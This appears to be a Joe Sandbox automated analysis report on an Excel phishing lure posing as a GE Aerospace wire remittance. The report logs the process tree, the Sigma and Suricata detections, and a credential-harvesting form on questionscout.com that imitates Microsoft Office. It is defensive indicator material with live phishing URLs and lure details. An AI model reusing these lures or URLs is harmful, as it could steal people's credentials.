Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GE AEROSPACE _WIRE REMITTANCE.xlsx

Overview

General Information

Sample name:GE AEROSPACE _WIRE REMITTANCE.xlsx
Analysis ID:1553460
MD5:757277c176f9e1422c082cba5dbad409
SHA1:80b655603ae9ea900748f6902674ddb1dcb52112
SHA256:e6232317838ffd2c888c40977818cb91f1fba39cdc658bd480889476710e8a2a
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Document contains encrypted data (likely password protected)
Tries to detect the country of the analysis system (by using the IP)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid

Classification

  • System is w10x64_ra
  • EXCEL.EXE (PID: 6172 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\GE AEROSPACE _WIRE REMITTANCE.xlsx" MD5: 4A871771235598812032C822E6F68F19)
    • chrome.exe (PID: 6244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://form.questionscout.com/672e80213f65b48c054fd942 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1808,i,12616564251290946413,13645178879606140381,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • splwow64.exe (PID: 5136 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cleanup
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.45, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6172, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 63761
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 63761, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6172, Protocol: tcp, SourceIp: 13.107.246.45, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T09:03:57.217772+010020283713Unknown Traffic192.168.2.166376113.107.246.45443TCP
2024-11-11T09:04:01.688280+010020283713Unknown Traffic192.168.2.166376213.107.246.45443TCP

Click to jump to signature section

Show All Signature Results

Location Tracking

barindex
Source: unknownDNS query: name: geolocation-db.com

Phishing

barindex
Source: https://form.questionscout.com/672e80213f65b48c054fd942LLM: Score: 9 Reasons: The brand 'Microsoft Office' is well-known and typically associated with the domain 'office.com' or 'microsoft.com'., The URL 'form.questionscout.com' does not match the legitimate domain for Microsoft Office., The domain 'questionscout.com' is not associated with Microsoft Office and appears to be a third-party service., The presence of input fields for EMAIL and PASSWORD on a non-Microsoft domain is suspicious and indicative of a phishing attempt. DOM: 1.0.pages.csv
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37HTTP Parser: Number of links: 0
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: Number of links: 1
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 782bd2a7-2c3d-44d2-8170-ad9df7dd72b2a732a1f7-0dd7-4413-8ff6-943c9bc58737
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: <input type="password" .../> found
Source: https://adi.actinkaeophl.com/tOaA22/HTTP Parser: No favicon
Source: https://adi.actinkaeophl.com/tOaA22/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638669090237943023.NzgyYmQyYTctMmMzZC00NGQyLTgxNzAtYWQ5ZGY3ZGQ3MmIyYTczMmExZjctMGRkNy00NDEzLThmZjYtOTQzYzliYzU4NzM3&ui_locales=en-US&mkt=en-US&client-request-id=ab36b428-17a3-472c-9788-5f19cfb0de1f&state=1k8t6yLHGIRMepSVcUDZoI7kbjj8xHvi02X84sUdZZhPqYvHP4QWctL2yYxiiXtx_aOxL9MXRnD9-F5LsbHMxK3IHPoxf8N3UHwbRcm2YjkAgdyBxgGON4ZnWcoMNGSA_nQqXXeHTRRLpAz1EnoCp0_XCpiEcDEUVdEa_FTtdUppsKq9Wx_rz7juraoVIXW5t8soKP-iHkYE_6ulQVcb9x4QfvyLWbE1sMr17bjlsvhagIqiHQEuqd5aaGsUXFUPyB8fRN2wMPqxAh1n673lsCIq-IrWq2sCKgwQqOCOrue6PFumejg3gFWnC6cBk-VGV5_s0tBO-nQz3JhDb3Jp9g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASWZ3SBPLN8QAPGSFWVE&scid=3ef691dea04c48df849303cb0bf2e707&req-trace-group=7dc51c382c915028cbaaee37HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS9AAYO8VF8D9ZABZJMI&scid=3ef691dea04c48df849303cb0bf2e707HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:63717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:63761 version: TLS 1.2
Source: excel.exeMemory has grown: Private usage: 7MB later: 71MB
Source: chrome.exeMemory has grown: Private usage: 8MB later: 30MB
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:63680 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:63761 -> 13.107.246.45:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:63762 -> 13.107.246.45:443
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.133
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
